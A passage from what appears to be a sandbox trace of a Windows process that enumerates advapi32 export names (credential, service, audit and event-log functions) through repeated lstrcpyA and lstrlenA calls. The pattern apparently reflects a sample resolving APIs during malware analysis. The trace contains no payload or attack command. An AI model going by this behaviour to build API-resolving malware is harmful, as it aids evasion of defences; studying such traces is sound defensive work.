lpString2="AuditLookupCategoryGuidFromCategoryId" | out: lpString1="AuditLookupCategoryGuidFromCategoryId") returned="AuditLookupCategoryGuidFromCategoryId" [0158.301] lstrlenA (lpString="AUDITLOOKUPCATEGORYGUIDFROMCATEGORYID") returned 37 [0158.301] lstrcpyA (in: lpString1=0x239e35c, lpString2="AuditLookupCategoryIdFromCategoryGuid" | out: lpString1="AuditLookupCategoryIdFromCategoryGuid") returned="AuditLookupCategoryIdFromCategoryGuid" [0158.301] lstrlenA (lpString="AUDITLOOKUPCATEGORYIDFROMCATEGORYGUID") returned 37 [0158.301] lstrcpyA (in: lpString1=0x239e35c, lpString2="AuditLookupCategoryNameA" | out: lpString1="AuditLookupCategoryNameA") returned="AuditLookupCategoryNameA" [0158.301] lstrlenA (lpString="AUDITLOOKUPCATEGORYNAMEA") returned 24 [0158.301] lstrcpyA (in: lpString1=0x239e35c, lpString2="AuditLookupCategoryNameW" | out: lpString1="AuditLookupCategoryNameW") returned="AuditLookupCategoryNameW" [0158.301] lstrlenA (lpString="AUDITLOOKUPCATEGORYNAMEW") returned 24 [0158.301] lstrcpyA (in: lpString1=0x239e35c, lpString2="AuditLookupSubCategoryNameA" | out: lpString1="AuditLookupSubCategoryNameA") returned="AuditLookupSubCategoryNameA" [0158.301] lstrlenA (lpString="AUDITLOOKUPSUBCATEGORYNAMEA") returned 27 [0158.301] lstrcpyA (in: lpString1=0x239e35c, lpString2="AuditLookupSubCategoryNameW" | out: lpString1="AuditLookupSubCategoryNameW") returned="AuditLookupSubCategoryNameW" [0158.301] lstrlenA (lpString="AUDITLOOKUPSUBCATEGORYNAMEW") returned 27 [0158.301] lstrcpyA (in: lpString1=0x239e35c, lpString2="AuditQueryGlobalSaclA" | out: lpString1="AuditQueryGlobalSaclA") returned="AuditQueryGlobalSaclA" [0158.301] lstrlenA (lpString="AUDITQUERYGLOBALSACLA") returned 21 [0158.302] lstrcpyA (in: lpString1=0x239e35c, lpString2="AuditQueryGlobalSaclW" | out: lpString1="AuditQueryGlobalSaclW") returned="AuditQueryGlobalSaclW" [0158.302] lstrlenA (lpString="AUDITQUERYGLOBALSACLW") returned 21 [0158.302] lstrcpyA (in: lpString1=0x239e35c, lpString2="AuditQueryPerUserPolicy" | out: lpString1="AuditQueryPerUserPolicy") returned="AuditQueryPerUserPolicy" [0158.302] lstrlenA (lpString="AUDITQUERYPERUSERPOLICY") returned 23 [0158.302] lstrcpyA (in: lpString1=0x239e35c, lpString2="AuditQuerySecurity" | out: lpString1="AuditQuerySecurity") returned="AuditQuerySecurity" [0158.302] lstrlenA (lpString="AUDITQUERYSECURITY") returned 18 [0158.302] lstrcpyA (in: lpString1=0x239e35c, lpString2="AuditQuerySystemPolicy" | out: lpString1="AuditQuerySystemPolicy") returned="AuditQuerySystemPolicy" [0158.302] lstrlenA (lpString="AUDITQUERYSYSTEMPOLICY") returned 22 [0158.302] lstrcpyA (in: lpString1=0x239e35c, lpString2="AuditSetGlobalSaclA" | out: lpString1="AuditSetGlobalSaclA") returned="AuditSetGlobalSaclA" [0158.302] lstrlenA (lpString="AUDITSETGLOBALSACLA") returned 19 [0158.302] lstrcpyA (in: lpString1=0x239e35c, lpString2="AuditSetGlobalSaclW" | out: lpString1="AuditSetGlobalSaclW") returned="AuditSetGlobalSaclW" [0158.302] lstrlenA (lpString="AUDITSETGLOBALSACLW") returned 19 [0158.302] lstrcpyA (in: lpString1=0x239e35c, lpString2="AuditSetPerUserPolicy" | out: lpString1="AuditSetPerUserPolicy") returned="AuditSetPerUserPolicy" [0158.302] lstrlenA (lpString="AUDITSETPERUSERPOLICY") returned 21 [0158.302] lstrcpyA (in: lpString1=0x239e35c, lpString2="AuditSetSecurity" | out: lpString1="AuditSetSecurity") returned="AuditSetSecurity" [0158.302] lstrlenA (lpString="AUDITSETSECURITY") returned 16 [0158.302] lstrcpyA (in: lpString1=0x239e35c, lpString2="AuditSetSystemPolicy" | out: lpString1="AuditSetSystemPolicy") returned="AuditSetSystemPolicy" [0158.302] lstrlenA (lpString="AUDITSETSYSTEMPOLICY") returned 20 [0158.302] lstrcpyA (in: lpString1=0x239e35c, lpString2="BackupEventLogA" | out: lpString1="BackupEventLogA") returned="BackupEventLogA" [0158.302] lstrlenA (lpString="BACKUPEVENTLOGA") returned 15 [0158.302] lstrcpyA (in: lpString1=0x239e35c, lpString2="BackupEventLogW" | out: lpString1="BackupEventLogW") returned="BackupEventLogW" [0158.302] lstrlenA (lpString="BACKUPEVENTLOGW") returned 15 [0158.302] lstrcpyA (in: lpString1=0x239e35c, lpString2="BuildExplicitAccessWithNameA" | out: lpString1="BuildExplicitAccessWithNameA") returned="BuildExplicitAccessWithNameA" [0158.302] lstrlenA (lpString="BUILDEXPLICITACCESSWITHNAMEA") returned 28 [0158.302] lstrcpyA (in: lpString1=0x239e35c, lpString2="BuildExplicitAccessWithNameW" | out: lpString1="BuildExplicitAccessWithNameW") returned="BuildExplicitAccessWithNameW" [0158.302] lstrlenA (lpString="BUILDEXPLICITACCESSWITHNAMEW") returned 28 [0158.302] lstrcpyA (in: lpString1=0x239e35c, lpString2="BuildImpersonateExplicitAccessWithNameA" | out: lpString1="BuildImpersonateExplicitAccessWithNameA") returned="BuildImpersonateExplicitAccessWithNameA" [0158.302] lstrlenA (lpString="BUILDIMPERSONATEEXPLICITACCESSWITHNAMEA") returned 39 [0158.302] lstrcpyA (in: lpString1=0x239e35c, lpString2="BuildImpersonateExplicitAccessWithNameW" | out: lpString1="BuildImpersonateExplicitAccessWithNameW") returned="BuildImpersonateExplicitAccessWithNameW" [0158.302] lstrlenA (lpString="BUILDIMPERSONATEEXPLICITACCESSWITHNAMEW") returned 39 [0158.302] lstrcpyA (in: lpString1=0x239e35c, lpString2="BuildImpersonateTrusteeA" | out: lpString1="BuildImpersonateTrusteeA") returned="BuildImpersonateTrusteeA" [0158.302] lstrlenA (lpString="BUILDIMPERSONATETRUSTEEA") returned 24 [0158.302] lstrcpyA (in: lpString1=0x239e35c, lpString2="BuildImpersonateTrusteeW" | out: lpString1="BuildImpersonateTrusteeW") returned="BuildImpersonateTrusteeW" [0158.302] lstrlenA (lpString="BUILDIMPERSONATETRUSTEEW") returned 24 [0158.302] lstrcpyA (in: lpString1=0x239e35c, lpString2="BuildSecurityDescriptorA" | out: lpString1="BuildSecurityDescriptorA") returned="BuildSecurityDescriptorA" [0158.302] lstrlenA (lpString="BUILDSECURITYDESCRIPTORA") returned 24 [0158.302] lstrcpyA (in: lpString1=0x239e35c, lpString2="BuildSecurityDescriptorW" | out: lpString1="BuildSecurityDescriptorW") returned="BuildSecurityDescriptorW" [0158.302] lstrlenA (lpString="BUILDSECURITYDESCRIPTORW") returned 24 [0158.303] lstrcpyA (in: lpString1=0x239e35c, lpString2="BuildTrusteeWithNameA" | out: lpString1="BuildTrusteeWithNameA") returned="BuildTrusteeWithNameA" [0158.303] lstrlenA (lpString="BUILDTRUSTEEWITHNAMEA") returned 21 [0158.303] lstrcpyA (in: lpString1=0x239e35c, lpString2="BuildTrusteeWithNameW" | out: lpString1="BuildTrusteeWithNameW") returned="BuildTrusteeWithNameW" [0158.303] lstrlenA (lpString="BUILDTRUSTEEWITHNAMEW") returned 21 [0158.303] lstrcpyA (in: lpString1=0x239e35c, lpString2="BuildTrusteeWithObjectsAndNameA" | out: lpString1="BuildTrusteeWithObjectsAndNameA") returned="BuildTrusteeWithObjectsAndNameA" [0158.303] lstrlenA (lpString="BUILDTRUSTEEWITHOBJECTSANDNAMEA") returned 31 [0158.303] lstrcpyA (in: lpString1=0x239e35c, lpString2="BuildTrusteeWithObjectsAndNameW" | out: lpString1="BuildTrusteeWithObjectsAndNameW") returned="BuildTrusteeWithObjectsAndNameW" [0158.303] lstrlenA (lpString="BUILDTRUSTEEWITHOBJECTSANDNAMEW") returned 31 [0158.303] lstrcpyA (in: lpString1=0x239e35c, lpString2="BuildTrusteeWithObjectsAndSidA" | out: lpString1="BuildTrusteeWithObjectsAndSidA") returned="BuildTrusteeWithObjectsAndSidA" [0158.303] lstrlenA (lpString="BUILDTRUSTEEWITHOBJECTSANDSIDA") returned 30 [0158.303] lstrcpyA (in: lpString1=0x239e35c, lpString2="BuildTrusteeWithObjectsAndSidW" | out: lpString1="BuildTrusteeWithObjectsAndSidW") returned="BuildTrusteeWithObjectsAndSidW" [0158.303] lstrlenA (lpString="BUILDTRUSTEEWITHOBJECTSANDSIDW") returned 30 [0158.303] lstrcpyA (in: lpString1=0x239e35c, lpString2="BuildTrusteeWithSidA" | out: lpString1="BuildTrusteeWithSidA") returned="BuildTrusteeWithSidA" [0158.303] lstrlenA (lpString="BUILDTRUSTEEWITHSIDA") returned 20 [0158.303] lstrcpyA (in: lpString1=0x239e35c, lpString2="BuildTrusteeWithSidW" | out: lpString1="BuildTrusteeWithSidW") returned="BuildTrusteeWithSidW" [0158.303] lstrlenA (lpString="BUILDTRUSTEEWITHSIDW") returned 20 [0158.303] lstrcpyA (in: lpString1=0x239e35c, lpString2="CancelOverlappedAccess" | out: lpString1="CancelOverlappedAccess") returned="CancelOverlappedAccess" [0158.303] lstrlenA (lpString="CANCELOVERLAPPEDACCESS") returned 22 [0158.303] lstrcpyA (in: lpString1=0x239e35c, lpString2="ChangeServiceConfig2A" | out: lpString1="ChangeServiceConfig2A") returned="ChangeServiceConfig2A" [0158.303] lstrlenA (lpString="CHANGESERVICECONFIG2A") returned 21 [0158.303] lstrcpyA (in: lpString1=0x239e35c, lpString2="ChangeServiceConfig2W" | out: lpString1="ChangeServiceConfig2W") returned="ChangeServiceConfig2W" [0158.303] lstrlenA (lpString="CHANGESERVICECONFIG2W") returned 21 [0158.303] lstrcpyA (in: lpString1=0x239e35c, lpString2="ChangeServiceConfigA" | out: lpString1="ChangeServiceConfigA") returned="ChangeServiceConfigA" [0158.303] lstrlenA (lpString="CHANGESERVICECONFIGA") returned 20 [0158.303] lstrcpyA (in: lpString1=0x239e35c, lpString2="ChangeServiceConfigW" | out: lpString1="ChangeServiceConfigW") returned="ChangeServiceConfigW" [0158.303] lstrlenA (lpString="CHANGESERVICECONFIGW") returned 20 [0158.303] lstrcpyA (in: lpString1=0x239e35c, lpString2="CheckTokenMembership" | out: lpString1="CheckTokenMembership") returned="CheckTokenMembership" [0158.303] lstrlenA (lpString="CHECKTOKENMEMBERSHIP") returned 20 [0158.303] lstrcpyA (in: lpString1=0x239e35c, lpString2="ClearEventLogA" | out: lpString1="ClearEventLogA") returned="ClearEventLogA" [0158.303] lstrlenA (lpString="CLEAREVENTLOGA") returned 14 [0158.303] lstrcpyA (in: lpString1=0x239e35c, lpString2="ClearEventLogW" | out: lpString1="ClearEventLogW") returned="ClearEventLogW" [0158.303] lstrlenA (lpString="CLEAREVENTLOGW") returned 14 [0158.303] lstrcpyA (in: lpString1=0x239e35c, lpString2="CloseCodeAuthzLevel" | out: lpString1="CloseCodeAuthzLevel") returned="CloseCodeAuthzLevel" [0158.303] lstrlenA (lpString="CLOSECODEAUTHZLEVEL") returned 19 [0158.303] lstrcpyA (in: lpString1=0x239e35c, lpString2="CloseEncryptedFileRaw" | out: lpString1="CloseEncryptedFileRaw") returned="CloseEncryptedFileRaw" [0158.303] lstrlenA (lpString="CLOSEENCRYPTEDFILERAW") returned 21 [0158.303] lstrcpyA (in: lpString1=0x239e35c, lpString2="CloseEventLog" | out: lpString1="CloseEventLog") returned="CloseEventLog" [0158.303] lstrlenA (lpString="CLOSEEVENTLOG") returned 13 [0158.303] lstrcpyA (in: lpString1=0x239e35c, lpString2="CloseServiceHandle" | out: lpString1="CloseServiceHandle") returned="CloseServiceHandle" [0158.304] lstrlenA (lpString="CLOSESERVICEHANDLE") returned 18 [0158.304] lstrcpyA (in: lpString1=0x239e35c, lpString2="CloseThreadWaitChainSession" | out: lpString1="CloseThreadWaitChainSession") returned="CloseThreadWaitChainSession" [0158.304] lstrlenA (lpString="CLOSETHREADWAITCHAINSESSION") returned 27 [0158.304] lstrcpyA (in: lpString1=0x239e35c, lpString2="CloseTrace" | out: lpString1="CloseTrace") returned="CloseTrace" [0158.304] lstrlenA (lpString="CLOSETRACE") returned 10 [0158.304] lstrcpyA (in: lpString1=0x239e35c, lpString2="CommandLineFromMsiDescriptor" | out: lpString1="CommandLineFromMsiDescriptor") returned="CommandLineFromMsiDescriptor" [0158.304] lstrlenA (lpString="COMMANDLINEFROMMSIDESCRIPTOR") returned 28 [0158.304] lstrcpyA (in: lpString1=0x239e35c, lpString2="ComputeAccessTokenFromCodeAuthzLevel" | out: lpString1="ComputeAccessTokenFromCodeAuthzLevel") returned="ComputeAccessTokenFromCodeAuthzLevel" [0158.304] lstrlenA (lpString="COMPUTEACCESSTOKENFROMCODEAUTHZLEVEL") returned 36 [0158.304] lstrcpyA (in: lpString1=0x239e35c, lpString2="ControlService" | out: lpString1="ControlService") returned="ControlService" [0158.304] lstrlenA (lpString="CONTROLSERVICE") returned 14 [0158.304] lstrcpyA (in: lpString1=0x239e35c, lpString2="ControlServiceExA" | out: lpString1="ControlServiceExA") returned="ControlServiceExA" [0158.304] lstrlenA (lpString="CONTROLSERVICEEXA") returned 17 [0158.304] lstrcpyA (in: lpString1=0x239e35c, lpString2="ControlServiceExW" | out: lpString1="ControlServiceExW") returned="ControlServiceExW" [0158.304] lstrlenA (lpString="CONTROLSERVICEEXW") returned 17 [0158.304] lstrcpyA (in: lpString1=0x239e35c, lpString2="ControlTraceA" | out: lpString1="ControlTraceA") returned="ControlTraceA" [0158.304] lstrlenA (lpString="CONTROLTRACEA") returned 13 [0158.304] lstrcpyA (in: lpString1=0x239e35c, lpString2="ControlTraceW" | out: lpString1="ControlTraceW") returned="ControlTraceW" [0158.304] lstrlenA (lpString="CONTROLTRACEW") returned 13 [0158.304] lstrcpyA (in: lpString1=0x239e35c, lpString2="ConvertAccessToSecurityDescriptorA" | out: lpString1="ConvertAccessToSecurityDescriptorA") returned="ConvertAccessToSecurityDescriptorA" [0158.304] lstrlenA (lpString="CONVERTACCESSTOSECURITYDESCRIPTORA") returned 34 [0158.304] lstrcpyA (in: lpString1=0x239e35c, lpString2="ConvertAccessToSecurityDescriptorW" | out: lpString1="ConvertAccessToSecurityDescriptorW") returned="ConvertAccessToSecurityDescriptorW" [0158.304] lstrlenA (lpString="CONVERTACCESSTOSECURITYDESCRIPTORW") returned 34 [0158.304] lstrcpyA (in: lpString1=0x239e35c, lpString2="ConvertSDToStringSDRootDomainA" | out: lpString1="ConvertSDToStringSDRootDomainA") returned="ConvertSDToStringSDRootDomainA" [0158.304] lstrlenA (lpString="CONVERTSDTOSTRINGSDROOTDOMAINA") returned 30 [0158.304] lstrcpyA (in: lpString1=0x239e35c, lpString2="ConvertSDToStringSDRootDomainW" | out: lpString1="ConvertSDToStringSDRootDomainW") returned="ConvertSDToStringSDRootDomainW" [0158.304] lstrlenA (lpString="CONVERTSDTOSTRINGSDROOTDOMAINW") returned 30 [0158.304] lstrcpyA (in: lpString1=0x239e35c, lpString2="ConvertSecurityDescriptorToAccessA" | out: lpString1="ConvertSecurityDescriptorToAccessA") returned="ConvertSecurityDescriptorToAccessA" [0158.304] lstrlenA (lpString="CONVERTSECURITYDESCRIPTORTOACCESSA") returned 34 [0158.304] lstrcpyA (in: lpString1=0x239e35c, lpString2="ConvertSecurityDescriptorToAccessNamedA" | out: lpString1="ConvertSecurityDescriptorToAccessNamedA") returned="ConvertSecurityDescriptorToAccessNamedA" [0158.304] lstrlenA (lpString="CONVERTSECURITYDESCRIPTORTOACCESSNAMEDA") returned 39 [0158.304] lstrcpyA (in: lpString1=0x239e35c, lpString2="ConvertSecurityDescriptorToAccessNamedW" | out: lpString1="ConvertSecurityDescriptorToAccessNamedW") returned="ConvertSecurityDescriptorToAccessNamedW" [0158.304] lstrlenA (lpString="CONVERTSECURITYDESCRIPTORTOACCESSNAMEDW") returned 39 [0158.304] lstrcpyA (in: lpString1=0x239e35c, lpString2="ConvertSecurityDescriptorToAccessW" | out: lpString1="ConvertSecurityDescriptorToAccessW") returned="ConvertSecurityDescriptorToAccessW" [0158.304] lstrlenA (lpString="CONVERTSECURITYDESCRIPTORTOACCESSW") returned 34 [0158.304] lstrcpyA (in: lpString1=0x239e35c, lpString2="ConvertSecurityDescriptorToStringSecurityDescriptorA" | out: lpString1="ConvertSecurityDescriptorToStringSecurityDescriptorA") returned="ConvertSecurityDescriptorToStringSecurityDescriptorA" [0158.304] lstrlenA (lpString="CONVERTSECURITYDESCRIPTORTOSTRINGSECURITYDESCRIPTORA") returned 52 [0158.305] lstrcpyA (in: lpString1=0x239e35c, lpString2="ConvertSecurityDescriptorToStringSecurityDescriptorW" | out: lpString1="ConvertSecurityDescriptorToStringSecurityDescriptorW") returned="ConvertSecurityDescriptorToStringSecurityDescriptorW" [0158.305] lstrlenA (lpString="CONVERTSECURITYDESCRIPTORTOSTRINGSECURITYDESCRIPTORW") returned 52 [0158.305] lstrcpyA (in: lpString1=0x239e35c, lpString2="ConvertSidToStringSidA" | out: lpString1="ConvertSidToStringSidA") returned="ConvertSidToStringSidA" [0158.305] lstrlenA (lpString="CONVERTSIDTOSTRINGSIDA") returned 22 [0158.305] lstrcpyA (in: lpString1=0x239e35c, lpString2="ConvertSidToStringSidW" | out: lpString1="ConvertSidToStringSidW") returned="ConvertSidToStringSidW" [0158.305] lstrlenA (lpString="CONVERTSIDTOSTRINGSIDW") returned 22 [0158.305] lstrcpyA (in: lpString1=0x239e35c, lpString2="ConvertStringSDToSDDomainA" | out: lpString1="ConvertStringSDToSDDomainA") returned="ConvertStringSDToSDDomainA" [0158.305] lstrlenA (lpString="CONVERTSTRINGSDTOSDDOMAINA") returned 26 [0158.305] lstrcpyA (in: lpString1=0x239e35c, lpString2="ConvertStringSDToSDDomainW" | out: lpString1="ConvertStringSDToSDDomainW") returned="ConvertStringSDToSDDomainW" [0158.305] lstrlenA (lpString="CONVERTSTRINGSDTOSDDOMAINW") returned 26 [0158.305] lstrcpyA (in: lpString1=0x239e35c, lpString2="ConvertStringSDToSDRootDomainA" | out: lpString1="ConvertStringSDToSDRootDomainA") returned="ConvertStringSDToSDRootDomainA" [0158.305] lstrlenA (lpString="CONVERTSTRINGSDTOSDROOTDOMAINA") returned 30 [0158.305] lstrcpyA (in: lpString1=0x239e35c, lpString2="ConvertStringSDToSDRootDomainW" | out: lpString1="ConvertStringSDToSDRootDomainW") returned="ConvertStringSDToSDRootDomainW" [0158.305] lstrlenA (lpString="CONVERTSTRINGSDTOSDROOTDOMAINW") returned 30 [0158.305] lstrcpyA (in: lpString1=0x239e35c, lpString2="ConvertStringSecurityDescriptorToSecurityDescriptorA" | out: lpString1="ConvertStringSecurityDescriptorToSecurityDescriptorA") returned="ConvertStringSecurityDescriptorToSecurityDescriptorA" [0158.305] lstrlenA (lpString="CONVERTSTRINGSECURITYDESCRIPTORTOSECURITYDESCRIPTORA") returned 52 [0158.305] lstrcpyA (in: lpString1=0x239e35c, lpString2="ConvertStringSecurityDescriptorToSecurityDescriptorW" | out: lpString1="ConvertStringSecurityDescriptorToSecurityDescriptorW") returned="ConvertStringSecurityDescriptorToSecurityDescriptorW" [0158.305] lstrlenA (lpString="CONVERTSTRINGSECURITYDESCRIPTORTOSECURITYDESCRIPTORW") returned 52 [0158.305] lstrcpyA (in: lpString1=0x239e35c, lpString2="ConvertStringSidToSidA" | out: lpString1="ConvertStringSidToSidA") returned="ConvertStringSidToSidA" [0158.305] lstrlenA (lpString="CONVERTSTRINGSIDTOSIDA") returned 22 [0158.305] lstrcpyA (in: lpString1=0x239e35c, lpString2="ConvertStringSidToSidW" | out: lpString1="ConvertStringSidToSidW") returned="ConvertStringSidToSidW" [0158.305] lstrlenA (lpString="CONVERTSTRINGSIDTOSIDW") returned 22 [0158.305] lstrcpyA (in: lpString1=0x239e35c, lpString2="ConvertToAutoInheritPrivateObjectSecurity" | out: lpString1="ConvertToAutoInheritPrivateObjectSecurity") returned="ConvertToAutoInheritPrivateObjectSecurity" [0158.305] lstrlenA (lpString="CONVERTTOAUTOINHERITPRIVATEOBJECTSECURITY") returned 41 [0158.305] lstrcpyA (in: lpString1=0x239e35c, lpString2="CopySid" | out: lpString1="CopySid") returned="CopySid" [0158.305] lstrlenA (lpString="COPYSID") returned 7 [0158.305] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateCodeAuthzLevel" | out: lpString1="CreateCodeAuthzLevel") returned="CreateCodeAuthzLevel" [0158.305] lstrlenA (lpString="CREATECODEAUTHZLEVEL") returned 20 [0158.305] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreatePrivateObjectSecurity" | out: lpString1="CreatePrivateObjectSecurity") returned="CreatePrivateObjectSecurity" [0158.305] lstrlenA (lpString="CREATEPRIVATEOBJECTSECURITY") returned 27 [0158.305] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreatePrivateObjectSecurityEx" | out: lpString1="CreatePrivateObjectSecurityEx") returned="CreatePrivateObjectSecurityEx" [0158.305] lstrlenA (lpString="CREATEPRIVATEOBJECTSECURITYEX") returned 29 [0158.305] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreatePrivateObjectSecurityWithMultipleInheritance" | out: lpString1="CreatePrivateObjectSecurityWithMultipleInheritance") returned="CreatePrivateObjectSecurityWithMultipleInheritance" [0158.305] lstrlenA (lpString="CREATEPRIVATEOBJECTSECURITYWITHMULTIPLEINHERITANCE") returned 50 [0158.305] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateProcessAsUserA" | out: lpString1="CreateProcessAsUserA") returned="CreateProcessAsUserA" [0158.306] lstrlenA (lpString="CREATEPROCESSASUSERA") returned 20 [0158.306] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0158.306] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0158.306] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateProcessWithLogonW" | out: lpString1="CreateProcessWithLogonW") returned="CreateProcessWithLogonW" [0158.306] lstrlenA (lpString="CREATEPROCESSWITHLOGONW") returned 23 [0158.306] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateProcessWithTokenW" | out: lpString1="CreateProcessWithTokenW") returned="CreateProcessWithTokenW" [0158.306] lstrlenA (lpString="CREATEPROCESSWITHTOKENW") returned 23 [0158.306] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateRestrictedToken" | out: lpString1="CreateRestrictedToken") returned="CreateRestrictedToken" [0158.306] lstrlenA (lpString="CREATERESTRICTEDTOKEN") returned 21 [0158.306] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateServiceA" | out: lpString1="CreateServiceA") returned="CreateServiceA" [0158.306] lstrlenA (lpString="CREATESERVICEA") returned 14 [0158.306] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateServiceW" | out: lpString1="CreateServiceW") returned="CreateServiceW" [0158.306] lstrlenA (lpString="CREATESERVICEW") returned 14 [0158.306] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateTraceInstanceId" | out: lpString1="CreateTraceInstanceId") returned="CreateTraceInstanceId" [0158.306] lstrlenA (lpString="CREATETRACEINSTANCEID") returned 21 [0158.306] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateWellKnownSid" | out: lpString1="CreateWellKnownSid") returned="CreateWellKnownSid" [0158.306] lstrlenA (lpString="CREATEWELLKNOWNSID") returned 18 [0158.306] lstrcpyA (in: lpString1=0x239e35c, lpString2="CredBackupCredentials" | out: lpString1="CredBackupCredentials") returned="CredBackupCredentials" [0158.306] lstrlenA (lpString="CREDBACKUPCREDENTIALS") returned 21 [0158.306] lstrcpyA (in: lpString1=0x239e35c, lpString2="CredDeleteA" | out: lpString1="CredDeleteA") returned="CredDeleteA" [0158.306] lstrlenA (lpString="CREDDELETEA") returned 11 [0158.306] lstrcpyA (in: lpString1=0x239e35c, lpString2="CredDeleteW" | out: lpString1="CredDeleteW") returned="CredDeleteW" [0158.306] lstrlenA (lpString="CREDDELETEW") returned 11 [0158.306] lstrcpyA (in: lpString1=0x239e35c, lpString2="CredEncryptAndMarshalBinaryBlob" | out: lpString1="CredEncryptAndMarshalBinaryBlob") returned="CredEncryptAndMarshalBinaryBlob" [0158.306] lstrlenA (lpString="CREDENCRYPTANDMARSHALBINARYBLOB") returned 31 [0158.306] lstrcpyA (in: lpString1=0x239e35c, lpString2="CredEnumerateA" | out: lpString1="CredEnumerateA") returned="CredEnumerateA" [0158.306] lstrlenA (lpString="CREDENUMERATEA") returned 14 [0158.306] lstrcpyA (in: lpString1=0x239e35c, lpString2="CredEnumerateW" | out: lpString1="CredEnumerateW") returned="CredEnumerateW" [0158.306] lstrlenA (lpString="CREDENUMERATEW") returned 14 [0158.306] lstrcpyA (in: lpString1=0x239e35c, lpString2="CredFindBestCredentialA" | out: lpString1="CredFindBestCredentialA") returned="CredFindBestCredentialA" [0158.306] lstrlenA (lpString="CREDFINDBESTCREDENTIALA") returned 23 [0158.306] lstrcpyA (in: lpString1=0x239e35c, lpString2="CredFindBestCredentialW" | out: lpString1="CredFindBestCredentialW") returned="CredFindBestCredentialW" [0158.306] lstrlenA (lpString="CREDFINDBESTCREDENTIALW") returned 23 [0158.306] lstrcpyA (in: lpString1=0x239e35c, lpString2="CredFree" | out: lpString1="CredFree") returned="CredFree" [0158.306] lstrlenA (lpString="CREDFREE") returned 8 [0158.306] lstrcpyA (in: lpString1=0x239e35c, lpString2="CredGetSessionTypes" | out: lpString1="CredGetSessionTypes") returned="CredGetSessionTypes" [0158.306] lstrlenA (lpString="CREDGETSESSIONTYPES") returned 19 [0158.306] lstrcpyA (in: lpString1=0x239e35c, lpString2="CredGetTargetInfoA" | out: lpString1="CredGetTargetInfoA") returned="CredGetTargetInfoA" [0158.306] lstrlenA (lpString="CREDGETTARGETINFOA") returned 18 [0158.307] lstrcpyA (in: lpString1=0x239e35c, lpString2="CredGetTargetInfoW" | out: lpString1="CredGetTargetInfoW") returned="CredGetTargetInfoW" [0158.307] lstrlenA (lpString="CREDGETTARGETINFOW") returned 18 [0158.307] lstrcpyA (in: lpString1=0x239e35c, lpString2="CredIsMarshaledCredentialA" | out: lpString1="CredIsMarshaledCredentialA") returned="CredIsMarshaledCredentialA" [0158.307] lstrlenA (lpString="CREDISMARSHALEDCREDENTIALA") returned 26 [0158.307] lstrcpyA (in: lpString1=0x239e35c, lpString2="CredIsMarshaledCredentialW" | out: lpString1="CredIsMarshaledCredentialW") returned="CredIsMarshaledCredentialW" [0158.307] lstrlenA (lpString="CREDISMARSHALEDCREDENTIALW") returned 26 [0158.307] lstrcpyA (in: lpString1=0x239e35c, lpString2="CredIsProtectedA" | out: lpString1="CredIsProtectedA") returned="CredIsProtectedA" [0158.307] lstrlenA (lpString="CREDISPROTECTEDA") returned 16 [0158.307] lstrcpyA (in: lpString1=0x239e35c, lpString2="CredIsProtectedW" | out: lpString1="CredIsProtectedW") returned="CredIsProtectedW" [0158.307] lstrlenA (lpString="CREDISPROTECTEDW") returned 16 [0158.307] lstrcpyA (in: lpString1=0x239e35c, lpString2="CredMarshalCredentialA" | out: lpString1="CredMarshalCredentialA") returned="CredMarshalCredentialA" [0158.307] lstrlenA (lpString="CREDMARSHALCREDENTIALA") returned 22 [0158.307] lstrcpyA (in: lpString1=0x239e35c, lpString2="CredMarshalCredentialW" | out: lpString1="CredMarshalCredentialW") returned="CredMarshalCredentialW" [0158.307] lstrlenA (lpString="CREDMARSHALCREDENTIALW") returned 22 [0158.307] lstrcpyA (in: lpString1=0x239e35c, lpString2="CredProfileLoaded" | out: lpString1="CredProfileLoaded") returned="CredProfileLoaded" [0158.307] lstrlenA (lpString="CREDPROFILELOADED") returned 17 [0158.307] lstrcpyA (in: lpString1=0x239e35c, lpString2="CredProfileUnloaded" | out: lpString1="CredProfileUnloaded") returned="CredProfileUnloaded" [0158.307] lstrlenA (lpString="CREDPROFILEUNLOADED") returned 19 [0158.307] lstrcpyA (in: lpString1=0x239e35c, lpString2="CredProtectA" | out: lpString1="CredProtectA") returned="CredProtectA" [0158.307] lstrlenA (lpString="CREDPROTECTA") returned 12 [0158.307] lstrcpyA (in: lpString1=0x239e35c, lpString2="CredProtectW" | out: lpString1="CredProtectW") returned="CredProtectW" [0158.307] lstrlenA (lpString="CREDPROTECTW") returned 12 [0158.307] lstrcpyA (in: lpString1=0x239e35c, lpString2="CredReadA" | out: lpString1="CredReadA") returned="CredReadA" [0158.307] lstrlenA (lpString="CREDREADA") returned 9 [0158.307] lstrcpyA (in: lpString1=0x239e35c, lpString2="CredReadByTokenHandle" | out: lpString1="CredReadByTokenHandle") returned="CredReadByTokenHandle" [0158.307] lstrlenA (lpString="CREDREADBYTOKENHANDLE") returned 21 [0158.307] lstrcpyA (in: lpString1=0x239e35c, lpString2="CredReadDomainCredentialsA" | out: lpString1="CredReadDomainCredentialsA") returned="CredReadDomainCredentialsA" [0158.308] lstrlenA (lpString="CREDREADDOMAINCREDENTIALSA") returned 26 [0158.308] lstrcpyA (in: lpString1=0x239e35c, lpString2="CredReadDomainCredentialsW" | out: lpString1="CredReadDomainCredentialsW") returned="CredReadDomainCredentialsW" [0158.308] lstrlenA (lpString="CREDREADDOMAINCREDENTIALSW") returned 26 [0158.308] lstrcpyA (in: lpString1=0x239e35c, lpString2="CredReadW" | out: lpString1="CredReadW") returned="CredReadW" [0158.308] lstrlenA (lpString="CREDREADW") returned 9 [0158.308] lstrcpyA (in: lpString1=0x239e35c, lpString2="CredRenameA" | out: lpString1="CredRenameA") returned="CredRenameA" [0158.308] lstrlenA (lpString="CREDRENAMEA") returned 11 [0158.308] lstrcpyA (in: lpString1=0x239e35c, lpString2="CredRenameW" | out: 